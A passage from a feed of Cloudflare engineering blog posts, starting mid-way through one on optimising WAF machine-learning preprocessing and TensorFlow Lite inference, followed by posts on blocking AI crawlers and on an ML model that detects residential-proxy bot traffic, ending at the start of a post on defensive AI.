        let mut iter = input.iter().peekable();
        for byte in window.iter_mut().skip(1) {
            *byte = next_byte(&mut iter)?;
        }
        Some(WindowedReplacer {
            window,
            input_iter: iter,
        })
    }
}

impl<'a> Iterator for WindowedReplacer<'a> {
    type Item = Window;

    #[inline]
    fn next(&mut self) -> Option {
        for i in 0..2 {
            self.window[i] = self.window[i + 1];
        }
        let byte = next_byte(&mut self.input_iter)?;
        self.window[2] = byte;
        Some(self.window)
    }
}
            By utilizing the WindowedReplacer, we simplify the replacement logic:
            if let Some(replacer) = WindowedReplacer::new(&input) {                
    for ngram in replacer.windows(3) {
        tensor[sig_vocab_lookup(ngram.try_into().unwrap())] += 1.0;
    }
}
            This new approach not only eliminates the need for allocating additional buffers to store replaced content, but also leverages Rust's iterator optimizations, which the compiler can more effectively optimize. You can view an example of the assembly output for this new iterator at the provided Godbolt link.
Now let's benchmark this and compare against the original implementation:

  
    Benchmark case
    Baseline time, μs
    Match time, μs
    Optimization
  

  
    preprocessing/long-body-9482
    248.46
    	51.00
    -79.47% or 4.87x
  
  
    preprocessing/avg-body-1000
    28.19
    	5.53
    -80.36% or 5.09x
  
  
    preprocessing/avg-url-44
    1.45
    0.40
    -72.11% or 3.59x
  
  
    preprocessing/avg-ua-91
    2.87
    0.69
    -76.07% or 4.18x
  
The new letters replacement implementation has doubled the preprocessing speed compared to the previously optimized version using match statements, and it is four to five times faster than the original version!
    
      Optimization attempt #4: Going nuclear with branchless ngram lookups
      
        
      
    
    At this point, 4-5x improvement might seem like a lot and there is no point pursuing any further optimizations. After all, using an ngram lookup with a match statement has beaten the following methods, with benchmarks omitted for brevity:

  
    Lookup method
    Description
  

  
    std::collections::HashMap
    Uses Google’s SwissTable design with SIMD lookups to scan multiple hash entries in parallel. 
  
  
    Aho-Corasick matcher with and without DFA
    Also utilizes SIMD instructions in some cases.
  
  
    phf crate 
    A library to generate efficient lookup tables at compile time using perfect hash functions.
  
  
    ph crate
    Another Rust library of data structures based on perfect hashing. 
  
  
    quickphf crate
    A Rust crate that allows you to use static compile-time generated hash maps and hash sets using PTHash perfect hash functions.
  
However, if we look again at the assembly of the norm_vocab_lookup function, it is clear that the execution flow has to perform a bunch of comparisons using cmp instructions. This creates many branches for the CPU to handle, which can lead to branch mispredictions. Branch mispredictions occur when the CPU incorrectly guesses the path of execution, causing delays as it discards partially completed instructions and fetches the correct ones. By reducing or eliminating these branches, we can avoid these mispredictions and improve the efficiency of the lookup process. How can we get rid of those branches when there is a need to look up thousands of unique ngrams?
Since there are only 3 bytes in each ngram, we can build two lookup tables of 256 x 256 x 256 size, storing the ngram tensor index. With this naive approach, our memory requirements will be: 256 x 256 x 256 x 2 x 2 = 64 MB, which seems like a lot.
However, given that we only care about ASCII bytes 0..127, then memory requirements can be lower: 128 x 128 x 128 x 2 x 2 = 8 MB, which is better. However, we will need to check for bytes >= 128, which will introduce a branch again.
So can we do better? Considering that the actual number of distinct byte values used in the ngrams is significantly less than the total possible 256 values, we can reduce memory requirements further by employing the following technique:
1. To avoid the branching caused by comparisons, we use precomputed offset lookup tables. This means instead of comparing each byte of the ngram during each lookup, we precompute the positions of each possible byte in a lookup table. This way, we replace the comparison operations with direct memory accesses, which are much faster and do not involve branching. We build an ngram bytes offsets lookup const array, storing each unique ngram byte offset position multiplied by the number of unique ngram bytes:
            const NGRAM_OFFSETS: [[u32; 256]; 3] = [
    [
        // offsets of first byte in ngram
    ],
    [
        // offsets of second byte in ngram
    ],
    [
        // offsets of third byte in ngram
    ],
];
            2. Then to obtain the ngram index, we can use this simple const function:
            #[inline]
const fn ngram_index(ngram: [u8; 3]) -> usize {
    (NGRAM_OFFSETS[0][ngram[0] as usize]
        + NGRAM_OFFSETS[1][ngram[1] as usize]
        + NGRAM_OFFSETS[2][ngram[2] as usize]) as usize
}
            3. To look up the tensor index based on the ngram index, we construct another const array at compile time using a list of all ngrams, where N is the number of unique ngram bytes:
            const NGRAM_TENSOR_IDX: [u16; N * N * N] = {
    let mut arr = [0; N * N * N];
    arr[ngram_index(*b"abc")] = 1;
    arr[ngram_index(*b"def")] = 2;
    arr[ngram_index(*b"wuq")] = 3;
    arr[ngram_index(*b"ijf")] = 4;
    arr[ngram_index(*b"iru")] = 5;
    arr[ngram_index(*b"piw")] = 6;
    arr[ngram_index(*b"mjw")] = 7;
    arr[ngram_index(*b"isn")] = 8;
    arr[ngram_index(*b"od ")] = 9;
    ...
    arr
};
            4. Finally, to update the tensor based on given ngram, we lookup the ngram index, then the tensor index, and then increment it with help of get_unchecked_mut, which avoids unnecessary (in this case) boundary checks and eliminates another source of branching:
            #[inline]
fn update_tensor_with_ngram(tensor: &mut [f32], ngram: [u8; 3]) {
    let ngram_idx = ngram_index(ngram);
    debug_assert!(ngram_idx < NGRAM_TENSOR_IDX.len());
    unsafe {
        let tensor_idx = *NGRAM_TENSOR_IDX.get_unchecked(ngram_idx) as usize;
        debug_assert!(tensor_idx < tensor.len());
        *tensor.get_unchecked_mut(tensor_idx) += 1.0;
    }
}
            This logic works effectively, passes correctness tests, and most importantly, it's completely branchless! Moreover, the memory footprint of used lookup arrays is tiny – just ~500 KiB of memory – which easily fits into modern CPU L2/L3 caches, ensuring that expensive cache misses are rare and performance is optimal.
The last trick we will employ is loop unrolling for ngrams processing. By taking 6 ngrams (corresponding to 8 bytes of the input array) at a time, the compiler can unroll the second loop and auto-vectorize it, leveraging parallel execution to improve performance:
            const CHUNK_SIZE: usize = 6;

let chunks_max_offset =
    ((input.len().saturating_sub(2)) / CHUNK_SIZE) * CHUNK_SIZE;
for i in (0..chunks_max_offset).step_by(CHUNK_SIZE) {
    for ngram in input[i..i + CHUNK_SIZE + 2].windows(3) {
        update_tensor_with_ngram(tensor, ngram.try_into().unwrap());
    }
}
            Tying up everything together, our final pre-processing benchmarks show the following:

  
    Benchmark case
    Baseline time, μs
    Branchless time, μs
    Optimization
  

  
    preprocessing/long-body-9482
    248.46
    21.53
    -91.33% or 11.54x
  
  
    preprocessing/avg-body-1000
    28.19
    2.33
    -91.73% or 12.09x
  
  
    preprocessing/avg-url-44
    1.45
    	0.26
    -82.34% or 5.66x
  
  
    preprocessing/avg-ua-91
    2.87
    	0.43
    -84.92% or 6.63x
  
The longer input is, the higher the latency drop will be due to branchless ngram lookups and loop unrolling, ranging from six to twelve times faster than baseline implementation.
After trying various optimizations, the final version of pre-processing retains optimization attempts 3 and 4, using branchless ngram lookup with offset tables and a single-pass non-allocating replacement iterator.
There are potentially more CPU cycles left on the table, and techniques like memory pre-fetching and manual SIMD intrinsics could speed this up a bit further. However, let's now switch gears into looking at inference latency a bit closer.
    
      Model inference optimizations
      
        
      
    
    
    
      Initial benchmarks
      
        
      
    
    Let’s have a look at original performance numbers of the WAF Attack Score ML model, which uses TensorFlow Lite 2.6.0:

  
    Benchmark case
    Inference time, μs
  

  
    inference/long-body-9482
    247.31
  
  
    inference/avg-body-1000
    246.31
  
  
    inference/avg-url-44
    246.40
  
  
    inference/avg-ua-91
    246.88
  
Model inference is actually independent of the original input length, as inputs are transformed into tensors of predetermined size during the pre-processing phase, which we optimized above. From now on, we will refer to a singular inference time when benchmarking our optimizations.
Digging deeper with profiler, we observed that most of the time is spent on the following operations:
            
            
            
            
            

  
    Function name
    % Time spent
  

  
    tflite::tensor_utils::PortableMatrixBatchVectorMultiplyAccumulate
    42.46%
  
  
    tflite::tensor_utils::PortableAsymmetricQuantizeFloats
    30.59%
  
  
    tflite::optimized_ops::SoftmaxImpl
    12.02%
  
  
    tflite::reference_ops::MaximumMinimumBroadcastSlow
    5.35%
  
  
    tflite::ops::builtin::elementwise::LogEval
    4.13%
  
The most expensive operation is matrix multiplication, which boils down to iteration within three nested loops:
            void PortableMatrixBatchVectorMultiplyAccumulate(const float* matrix,
                                                 int m_rows, int m_cols,
                                                 const float* vector,
                                                 int n_batch, float* result) {
  float* result_in_batch = result;
  for (int b = 0; b < n_batch; b++) {
    const float* matrix_ptr = matrix;
    for (int r = 0; r < m_rows; r++) {
      float dot_prod = 0.0f;
      const float* vector_in_batch = vector + b * m_cols;
      for (int c = 0; c < m_cols; c++) {
        dot_prod += *matrix_ptr++ * *vector_in_batch++;
      }
      *result_in_batch += dot_prod;
     ++result_in_batch;
    }
  }
}
            This doesn’t look very efficient and many blogs and research papers have been written on how matrix multiplication can be optimized, which basically boils down to:
Blocking: Divide matrices into smaller blocks that fit into the cache, improving cache reuse and reducing memory access latency.
Vectorization: Use SIMD instructions to process multiple data points in parallel, enhancing efficiency with vector registers.
Loop Unrolling: Reduce loop control overhead and increase parallelism by executing multiple loop iterations simultaneously.
To gain a better understanding of how these techniques work, we recommend watching this video, which brilliantly depicts the process of matrix multiplication:

    
      Tensorflow Lite with AVX2
      
        
      
    
    TensorFlow Lite does, in fact, support SIMD matrix multiplication – we just need to enable it and re-compile the TensorFlow Lite library:
            if [[ "$(uname -m)" == x86_64* ]]; then
    # On x86_64 target x86-64-v3 CPU to enable AVX2 and FMA.
    arguments+=("--copt=-march=x86-64-v3")
fi
            After running profiler again using the SIMD-optimized TensorFlow Lite library:
            
            
            
            
            
Top operations as per profiler output:

  
    Function name
    % Time spent
  

  
    tflite::tensor_utils::SseMatrixBatchVectorMultiplyAccumulateImpl
    43.01%
  
  
    tflite::tensor_utils::NeonAsymmetricQuantizeFloats
    22.46%
  
  
    tflite::reference_ops::MaximumMinimumBroadcastSlow
    7.82%
  
  
    tflite::optimized_ops::SoftmaxImpl
    6.61%
  
  
    tflite::ops::builtin::elementwise::LogEval
    4.63%
  
Matrix multiplication now uses AVX2 instructions, which uses blocks of 8x8 to multiply and accumulate the multiplication result.
Proportionally, matrix multiplication and quantization operations take a similar time share when compared to non-SIMD version, however in absolute numbers, it’s almost twice as fast when SIMD optimizations are enabled:

  
    Benchmark case
    Baseline time, μs
    SIMD time, μs
    Optimization
  

  
    inference/avg-body-1000
    246.31
    130.07
    -47.19% or 1.89x
  
Quite a nice performance boost just from a few lines of build config change!
    
      Tensorflow Lite with XNNPACK
      
        
      
    
    Tensorflow Lite comes with a useful benchmarking tool called benchmark_model, which also has a built-in profiler.
The tool can be built locally using the command:
            bazel build -j 4 --copt=-march=native -c opt tensorflow/lite/tools/benchmark:benchmark_model
            After building, benchmarks were run with different settings:

  
    Benchmark run
    Inference time, μs
  

  
    benchmark_model --graph=model.tflite --num_runs=100000 --use_xnnpack=false
    105.61
  
  
    benchmark_model --graph=model.tflite --num_runs=100000 --use_xnnpack=true --xnnpack_force_fp16=true
    111.95
  
  
    benchmark_model --graph=model.tflite --num_runs=100000 --use_xnnpack=true
    49.05
  
Tensorflow Lite with XNNPACK enabled emerges as a leader, achieving ~50% latency reduction, when compared to the original Tensorflow Lite implementation.
More technical details about XNNPACK can be found in these blog posts:
Profiling XNNPACK with TFLite
Faster Dynamically Quantized Inference with XNNPack
Re-running benchmarks with XNNPack enabled, we get the following results:

  
    Benchmark case
    Baseline time, μs
TFLite 2.6.0
    SIMD time, μs
TFLite 2.6.0
    SIMD time, μs
TFLite 2.16.1
    SIMD + XNNPack time, μs
TFLite 2.16.1
    Optimization
  


  
    inference/avg-body-1000
    246.31
    130.07
    115.17
    56.22
    -77.17% or 4.38x
  
By upgrading TensorFlow Lite from 2.6.0 to 2.16.1 and enabling SIMD optimizations along with the XNNPack, we were able to decrease WAF ML model inference time more than four-fold, achieving a 77.17% reduction.
    
      Caching inference result
      
        
      
    
    While making code faster through pre-processing and inference optimizations is great, it's even better when code doesn't need to run at all. This is where caching comes in. Amdahl's Law suggests that optimizing only parts of a program has diminishing returns. By avoiding redundant executions with caching, we can achieve significant performance gains beyond the limitations of traditional code optimization.
A simple key-value cache would quickly occupy all available memory on the server due to the high cardinality of URLs, HTTP headers, and HTTP bodies. However, because "everything on the Internet has an L-shape" or more specifically, follows a Zipf's law distribution, we can optimize our caching strategy.
Zipf's law states that in many natural datasets, the frequency of any item is inversely proportional to its rank in the frequency table. In other words, a few items are extremely common, while the majority are rare. By analyzing our request data, we found that URLs, HTTP headers, and even HTTP bodies follow this distribution. For example, here is the user agent header frequency distribution against its rank:
            
            
            
            
            
By caching the top-N most frequently occurring inputs and their corresponding inference results, we can ensure that both pre-processing and inference are skipped for the majority of requests. This is where the Least Recently Used (LRU) cache comes in – frequently used items stay hot in the cache, while the least recently used ones are evicted.
We use lua-resty-mlcache as our caching solution, allowing us to share cached inference results between different Nginx workers via a shared memory dictionary. The LRU cache effectively exploits the space-time trade-off, where we trade a small amount of memory for significant CPU time savings.
This approach enables us to achieve a ~70% cache hit ratio, significantly reducing latency further, as we will analyze in the final section below.
    
      Optimization results
      
        
      
    
    The optimizations discussed in this post were rolled out in several phases to ensure system correctness and stability.
First, we enabled SIMD optimizations for TensorFlow Lite, which reduced WAF ML total execution time by approximately 41.80%, decreasing from 1519 ➔ 884 μs on average.
            
            
            
            
            
Next, we upgraded TensorFlow Lite from version 2.6.0 to 2.16.1, enabled XNNPack, and implemented pre-processing optimizations. This further reduced WAF ML total execution time by ~40.77%, bringing it down from 932 ➔ 552 μs on average. The initial average time of 932 μs was slightly higher than the previous 884 μs due to the increased number of customers using this feature and the months that passed between changes.
            
            
            
            
            
Lastly, we introduced LRU caching, which led to an additional reduction in WAF ML total execution time by ~50.18%, from 552 ➔ 275 μs on average.
            
            
            
            
            
Overall, we cut WAF ML execution time by ~81.90%, decreasing from 1519 ➔ 275 μs, or 5.5x faster!
To illustrate the significance of this: with Cloudflare’s average rate of 9.5 million requests per second passing through WAF ML, saving 1244 microseconds per request equates to saving ~32 years of processing time every single day! That’s in addition to the savings of 523 microseconds per request or 65 years of processing time per day demonstrated last year in our Every request, every microsecond: scalable machine learning at Cloudflare post about our Bot Management product.
    
      Conclusion
      
        
      
    
    We hope you enjoyed reading about how we made our WAF ML models go brrr, just as much as we enjoyed implementing these optimizations to bring scalable WAF ML to more customers on a truly global scale.
Looking ahead, we are developing even more sophisticated ML security models. These advancements aim to bring our WAF and Bot Management products to the next level, making them even more useful and effective for our customers. 


Declare your AIndependence: block AI bots, scrapers and crawlers with a single click
Alex Bocharov — Wed, 03 Jul 2024 13:00:26 GMT
 
            
            
            
            
            
To help preserve a safe Internet for content creators, we’ve just launched a brand new “easy button” to block all AI bots. It’s available for all customers, including those on our free tier.
The popularity of generative AI has made the demand for content used to train models or run inference on skyrocket, and, although some AI companies clearly identify their web scraping bots, not all AI companies are being transparent. Google reportedly paid $60 million a year to license Reddit’s user generated content, and most recently, Perplexity has been accused of impersonating legitimate visitors in order to scrape content from websites. The value of original content in bulk has never been higher.
Last year, Cloudflare announced the ability for customers to easily block AI bots that behave well. These bots follow robots.txt, and don’t use unlicensed content to train their models or run inference for RAG applications using website data. Even though these AI bots follow the rules, Cloudflare customers overwhelmingly opt to block them.
            
            
            
            
            
We hear clearly that customers don’t want AI bots visiting their websites, and especially those that do so dishonestly. To help, we’ve added a brand new one-click to block all AI bots. It’s available for all customers, including those on the free tier. To enable it, simply navigate to the Security > Bots section of the Cloudflare dashboard, and click the toggle labeled AI Scrapers and Crawlers.
            
            
            
            
            
This feature will automatically be updated over time as we see new fingerprints of offending bots we identify as widely scraping the web for model training. To ensure we have a comprehensive understanding of all AI crawler activity, we surveyed traffic across our network.
    
      AI bot activity today
      
        
      
    
    The graph below illustrates the most popular AI bots seen on Cloudflare’s network in terms of their request volume. We looked at common AI crawler user agents and aggregated the number of requests on our platform from these AI user agents over the last year:
            
            
            
            
            
When looking at the number of requests made to Cloudflare sites, we see that Bytespider, Amazonbot, ClaudeBot, and GPTBot are the top four AI crawlers. Operated by ByteDance, the Chinese company that owns TikTok, Bytespider is reportedly used to gather training data for its large language models (LLMs), including those that support its ChatGPT rival, Doubao. Amazonbot and ClaudeBot follow Bytespider in request volume. Amazonbot, reportedly used to index content for Alexa’s question-answering, sent the second-most number of requests and ClaudeBot, used to train the Claude chat bot, has recently increased in request volume.
Among the top AI bots that we see, Bytespider not only leads in terms of number of requests but also in both the extent of its Internet property crawling and the frequency with which it is blocked. Following closely is GPTBot, which ranks second in both crawling and being blocked. GPTBot, managed by OpenAI, collects training data for its LLMs, which underpin AI-driven products such as ChatGPT. In the table below, “Share of websites accessed” refers to the proportion of websites protected by Cloudflare that were accessed by the named AI bot.

  
    AI Bot
    Share of Websites Accessed
  

  
    Bytespider
    40.40%
  
  
    GPTBot
    35.46%
  
  
    ClaudeBot
    11.17%
  
  
    ImagesiftBot
    8.75%
  
  
    CCBot
    2.14%
  
  
    ChatGPT-User
    1.84%
  
  
    omgili
    0.10%
  
  
    Diffbot
    0.08%
  
  
    Claude-Web
    0.04%
  
  
    PerplexityBot
    0.01%
  
While our analysis identified the most popular crawlers in terms of request volume and number of Internet properties accessed, many customers are likely not aware of the more popular AI crawlers actively crawling their sites. Our Radar team performed an analysis of the top robots.txt entries across the top 10,000 Internet domains to identify the most commonly actioned AI bots, then looked at how frequently we saw these bots on sites protected by Cloudflare.
In the graph below, which looks at disallowed crawlers for these sites, we see that customers most often reference GPTBot, CCBot, and Google in robots.txt, but do not specifically disallow popular AI crawlers like Bytespider and ClaudeBot.
            
            
            
            
            
With the Internet now flooded with these AI bots, we were curious to see how website operators have already responded. In June, AI bots accessed around 39% of the top one million Internet properties using Cloudflare, but only 2.98% of these properties took measures to block or challenge those requests. Moreover, the higher-ranked (more popular) an Internet property is, the more likely it is to be targeted by AI bots, and correspondingly, the more likely it is to block such requests.

  
    Top N Internet properties by number of visitors seen by Cloudflare
    % accessed by AI bots
    % blocking AI bots
  

  
    10
    80.0%
    40.0%
  
  
    100
    63.0%
    16.0%
  
  
    1,000
    53.2%
    8.8%
  
  
    10,000
    47.99%
    8.92%
  
  
    100,000
    44.53%
    6.36%
  
  
    1,000,000
    38.73%
    2.98%
  

            
            
            
            
            
We see website operators completely block access to these AI crawlers using robots.txt. However, these blocks are reliant on the bot operator respecting robots.txt and adhering to RFC9309 (ensuring variations on user against all match the product token) to honestly identify who they are when they visit an Internet property, but user agents are trivial for bot operators to change.
    
      How we find AI bots pretending to be real web browsers
      
        
      
    
    Sadly, we’ve observed bot operators attempt to appear as though they are a real browser by using a spoofed user agent. We’ve monitored this activity over time, and we’re proud to say that our global machine learning model has always recognized this activity as a bot, even when operators lie about their user agent.
            
            
            
            
            
Take one example of a specific bot that others observed to be hiding their activity. We ran an analysis to see how our machine learning models scored traffic from this bot. In the diagram below, you can see that all bot scores are firmly below 30, indicating that our scoring thinks this activity is likely to be coming from a bot.
The diagram reflects scoring of the requests using our newest model, where “hotter” colors indicate more requests falling in that band, and “cooler” colors meaning fewer requests did. We can see the vast majority of requests fell into the bottom two bands, showing that Cloudflare’s model gave the offending bot a score of 9 or less. The user agent changes have no effect on the score, because this is the very first thing we expect bot operators to do.
            
            
            
            
            
Any customer with an existing WAF rule set to challenge visitors with a bot score below 30 (our recommendation) automatically blocked all of this AI bot traffic with no new action on their part. The same will be true for future AI bots that use similar techniques to hide their activity.
We leverage Cloudflare global signals to calculate our Bot Score, which for AI bots like the one above, reflects that we correctly identify and score them as a “likely bot.”
When bad actors attempt to crawl websites at scale, they generally use tools and frameworks that we are able to fingerprint. For every fingerprint we see, we use Cloudflare’s network, which sees over 57 million requests per second on average, to understand how much we should trust this fingerprint. To power our models, we compute global aggregates across many signals. Based on these signals, our models were able to appropriately flag traffic from evasive AI bots, like the example mentioned above, as bots.
The upshot of this globally aggregated data is that we can immediately detect new scraping tools and their behavior without needing to manually fingerprint the bot, ensuring that customers stay protected from the newest waves of bot activity.
If you have a tip on an AI bot that’s not behaving, we’d love to investigate. There are two options you can use to report misbehaving AI crawlers:
1. Enterprise Bot Management customers can submit a False Negative Feedback Loop report via Bot Analytics by simply selecting the segment of traffic where they noticed misbehavior:
            
            
            
            
            
2. We’ve also set up a reporting tool where any Cloudflare customer can submit reports of an AI bot scraping your website without permission.
We fear that some AI companies intent on circumventing rules to access content will persistently adapt to evade bot detection. We will continue to keep watch and add more bot blocks to our AI Scrapers and Crawlers rule and evolve our machine learning models to help keep the Internet a place where content creators can thrive and keep full control over which models their content is used to train or run inference on. 


Using machine learning to detect bot attacks that leverage residential proxies
Bob AminAzad — Mon, 24 Jun 2024 13:00:17 GMT
 
Bots using residential proxies are a major source of frustration for security engineers trying to fight online abuse. These engineers often see a similar pattern of abuse when well-funded, modern botnets target their applications. Advanced bots bypass country blocks, ASN blocks, and rate-limiting. Every time, the bot operator moves to a new IP address space until they blend in perfectly with the “good” traffic, mimicking real users’ behavior and request patterns. Our new Bot Management machine learning model (v8) identifies residential proxy abuse without resorting to IP blocking, which can cause false positives for legitimate users.  
    
      Background
      
        
      
    
    One of the main sources of Cloudflare’s bot score is our bot detection machine learning model which analyzes, on average, over 46 million HTTP requests per second in real time. Since our first Bot Management ML model was released in 2019, we have continuously evolved and improved the model. Nowadays, our models leverage features based on request fingerprints, behavioral signals, and global statistics and trends that we see across our network.
Each iteration of the model focuses on certain areas of improvement. This process starts with a rigorous R&D phase to identify the emerging patterns of bot attacks by reviewing feedback from our customers and reports of missed attacks. In v8, we mainly focused on two areas of abuse. First, we analyzed the campaigns that leverage residential IP proxies, which are proxies on residential networks commonly used to launch widely distributed attacks against high profile targets. In addition to that, we improved model accuracy for detecting attacks that originate from cloud providers.
    
      Residential IP proxies
      
        
      
    
    Proxies allow attackers to hide their identity and distribute their attack. Moreover, IP address rotation allows attackers to directly bypass traditional defenses such as IP reputation and IP rate limiting. Knowing this, defenders use a plethora of signals to identify malicious use of proxies. In its simplest forms, IP reputation signals (e.g., data center IP addresses, known open proxies, etc.) can lead to the detection of such distributed attacks.
However, in the past few years, bot operators have started favoring proxies operating in residential network IP address space. By using residential IP proxies, attackers can masquerade as legitimate users by sending their traffic through residential networks. Nowadays, residential IP proxies are offered by companies that facilitate access to large pools of IP addresses for attackers. Residential proxy providers claim to offer 30-100 million IPs belonging to residential and mobile networks across the world. Most commonly, these IPs are sourced by partnering with free VPN providers, as well as including the proxy SDKs into popular browser extensions and mobile applications. This allows residential proxy providers to gain a foothold on victims’ devices and abuse their residential network connections.
            
            
            
            
            
Figure 1: Architecture of a residential proxy network
Figure 1 depicts the architecture of a residential proxy. By subscribing to these services, attackers gain access to an authenticated proxy gateway address commonly using the HTTPS/SOCKS5 proxy protocol. Some residential proxy providers allow their users to select the country or region for the proxy exit nodes. Alternatively, users can choose to keep the same IP address throughout their session or rotate to a new one for each outgoing request. Residential proxy providers then identify active exit nodes on their network (on devices that they control within residential networks across the world) and route the proxied traffic through them.
The large pool of IP addresses and the diversity of networks poses a challenge to traditional bot defense mechanisms that rely on IP reputation and rate limiting. Moreover, the diversity of IPs enables the attackers to rotate through them indefinitely. This shrinks the window of opportunity for bot detection systems to effectively detect and stop the attacks. Effective defense against residential proxy attacks should be able to detect this type of bot traffic either based on single request features to stop the attack immediately, or identify unique fingerprints from the browsing agent to track and mitigate the bot traffic regardless of the IP source. Overly broad blocking actions, such as IP block-listing, by definition, would result in blocking legitimate traffic from residential networks where at least one device is acting as a residential proxy node.
    
      ML model training
      
        
      
    
    At its heart, our model is built using a chain of modules that work together. Initially, we fetch and prepare training and validation datasets from our Clickhouse data storage. We use datasets with high confidence labels as part of our training. For model validation, we use datasets consisting of missed attacks reported by our customers, known sources of bot traffic (e.g., verified bots), and high confidence detections from other bot management modules (e.g., heuristics engine). We orchestrate these steps using Apache Airflow, which enables us to customize each stage of the ML model training and define the interdependencies of our training, validation, and reporting modules in the form of directed acyclic graphs (DAGs).
The first step of training a new model is fetching labeled training data from our data store. Under the hood, our dataset definitions are SQL queries that will materialize by fetching data from our Clickhouse cluster where we store feature values and calculate aggregates from the traffic on our network. Figure 2 depicts these steps as train and validation dataset fetch operations. Introducing new datasets can be as straightforward as writing the SQL queries to filter the desired subset of requests.
            
            
            
            
            
Figure 2: Airflow DAG for model training and validation
After fetching the datasets, we train our Catboost model and tune its hyper parameters. During evaluation, we compare the performance of the newly trained model against the current default version running for our customers. To capture the intricate patterns in subsets of our data, we split certain validation datasets into smaller slivers called specializations. For instance, we use the detections made by our heuristics engine and managed rulesets as ground truth for bot traffic. To ensure that larger sources of traffic (large ASNs, different HTTP versions, etc.) do not mask our visibility into patterns for the rest of the traffic, we define specializations for these sources of traffic. As a result, improvements in accuracy of the new model can be evaluated for common patterns (e.g., HTTP/1.1 and HTTP/2) as well as less common ones. Our model training DAG will provide a breakdown report for the accuracy, score distribution, feature importance, and SHAP explainers for each validation dataset and its specializations.
Once we are happy with the validation results and model accuracy, we evaluate our model against a checklist of steps to ensure the correctness and validity of our model. We start by ensuring that our results and observations are reproducible over multiple non-overlapping training and validation time ranges. Moreover, we check for the following factors:
Check for the distribution of feature values to identify irregularities such as missing or skewed values.
Check for overlaps between training and validation datasets and feature values.
Verify the diversity of training data and the balance between labels and datasets.
Evaluate performance changes in the accuracy of the model on validation datasets based on their order of importance.
Check for model overfitting by evaluating the feature importance and SHAP explainers.
After the model passes the readiness checks, we deploy it in shadow mode. We can observe the behavior of the model on live traffic in log-only mode (i.e., without affecting the bot score). After gaining confidence in the model's performance on live traffic, we start onboarding beta customers, and gradually switch the model to active mode all while closely monitoring the real-world performance of our new model.
    
      ML features for bot detection
      
        
      
    
    Each of our models uses a set of features to make inferences about the incoming requests. We compute our features based on single request properties (single request features) and patterns from multiple requests (i.e., inter-request features). We can categorize these features into the following groups:
Global features: inter-request features that are computed based on global aggregates for different types of fingerprints and traffic sources (e.g., for an ASN) seen across our global network. Given the relatively lower cardinality of these features, we can scalably calculate global aggregates for each of them.
High cardinality features: inter-request features focused on fine-grained aggregate data from local traffic patterns and behaviors (e.g., for an individual IP address)
Single request features: features derived from each individual request (e.g., user agent).
Our Bot Management system (named BLISS) is responsible for fetching and computing these feature values and making them available on our servers for inference by active versions of our ML models.
    
      Detecting residential proxies using network and behavioral signals
      
        
      
    
    Attacks originating from residential IP addresses are commonly characterized by a spike in the overall traffic towards sensitive endpoints on the target websites from a large number of residential ASNs. Our approach for detecting residential IP proxies is twofold. First, we start by comparing direct vs proxied requests and looking for network level discrepancies. Revisiting Figure 1, we notice that a request routed through residential proxies (red dotted line) has to traverse through multiple hops before reaching the target, which affects the network latency of the request.
Based on this observation alone, we are able to characterize residential proxy traffic with a high true positive rate (i.e., all residential proxy requests have high network latency). While we were able to replicate this in our lab environment, we quickly realized that at the scale of the Internet, we run into numerous exceptions with false positive detections (i.e., non-residential proxy traffic with high latency). For instance, countries and regions that predominantly use satellite Internet would exhibit a high network latency for the majority of their requests due to the use of performance enhancing proxies.
Realizing that relying solely on network characteristics of connections to detect residential proxies is inadequate given the diversity of the connections on the Internet, we switched our focus to the behavior of residential IPs. To that end, we observe that the IP addresses from residential proxies express a distinct behavior during periods of peak activity. While this observation singles out highly active IPs over their peak activity time, given the pool size of residential IPs, it is not uncommon to only observe a small number of requests from the majority of residential proxy IPs.
These periods of inactivity can be attributed to the temporary nature of residential proxy exit nodes. For instance, when the client software (i.e., browser or mobile application) that runs the exit nodes of these proxies is closed, the node leaves the residential proxy network. One way to filter out periods of inactivity is to increase the monitoring time and punish each IP address that exhibits residential proxy behavior for a period of time. This block-listing approach, however, has certain limitations. Most importantly, by relying only on IP-based behavioral signals, we would block traffic from legitimate users that may unknowingly run mobile applications or browser extensions that turn their devices into proxies. This is further detrimental for mobile networks where many users share their IPs behind CGNATs. Figure 3 demonstrates this by comparing the share of direct vs proxied requests that we received from active residential proxy IPs over a 24-hour period. Overall, we see that 4 out of 5 requests from these networks belong to direct and benign connections from residential devices.
            
            
            
            
            
Figure 3: Percentage of direct vs proxied requests from residential proxy IPs.
Using this insight, we combined behavioral and latency-based features along with new datasets to train a new machine learning model that detects residential proxy traffic on a per-request basis. This scheme allows us to block residential proxy traffic while allowing benign residential users to visit Cloudflare-protected websites from the same residential network.
    
      Detection results and case studies
      
        
      
    
    We started testing v8 in shadow mode in March 2024. Every hour, v8 is classifying more than 17 million unique IPs that participate in residential proxy attacks. Figure 4 shows the geographic distribution of IPs with residential proxy activity belonging to more than 45 thousand ASNs in 237 countries/regions. Among the most commonly requested endpoints from residential proxies, we observe patterns of account takeover attempts, such as requests to /login, /auth/login, and /api/login.  
            
            
            
            
            
Figure 4: Countries and regions with residential network activity. Size of markers are proportionate to the number of IPs with residential proxy activity.
Furthermore, we see significant improvements when evaluating our new machine learning model on previously missed attacks reported by our customers. In one case, v8 was able to correctly classify 95% of requests from distributed residential proxy attacks targeting the voucher redemption endpoint of the customer’s website. In another case, our new model successfully detected a previously missed content scraping attack evident by increased detection during traffic spikes depicted in Figure 5. We are continuing to monitor the behavior of residential proxy attacks in the wild and work with our customers to ensure that we can provide robust detection against these distributed attacks.
            
            
            
            
            
Figure 5: Spikes in bot requests from residential proxies detected by ML v8
    
      Improving detection for bots from cloud providers
      
        
      
    
    In addition to residential IP proxies, bot operators commonly use cloud providers to host and run bot scripts that attack our customers. To combat these attacks, we improved our ground truth labels for cloud provider attacks in our latest ML training datasets. Early results show that v8 detects 20% more bots from cloud providers, with up to 70% more bots detected on zones that are marked as under attack. We further plan to expand the list of cloud providers that v8 detects as part of our ongoing updates.
    
      Check out ML v8
      
        
      
    
    For existing Bot Management customers we recommend toggling “Auto-update machine learning model” to instantly gain the benefits of ML v8 and its residential proxy detection, and to stay up to date with our future ML model updates. If you’re not a Cloudflare Bot Management customer, contact our sales team to try out Bot Management. 


Defensive AI: Cloudflare’s framework for defending against next-gen threats
Daniele Molteni — Mon, 04 Mar 2024 14:00:24 GMT
 
            
            
            
            
            
Generative AI has captured the imagination of the world by being able to produce poetry, screenplays, or imagery. These tools can be used to improve human productivity for good causes, but they can also be employed by malicious actors to carry out sophisticated attacks.
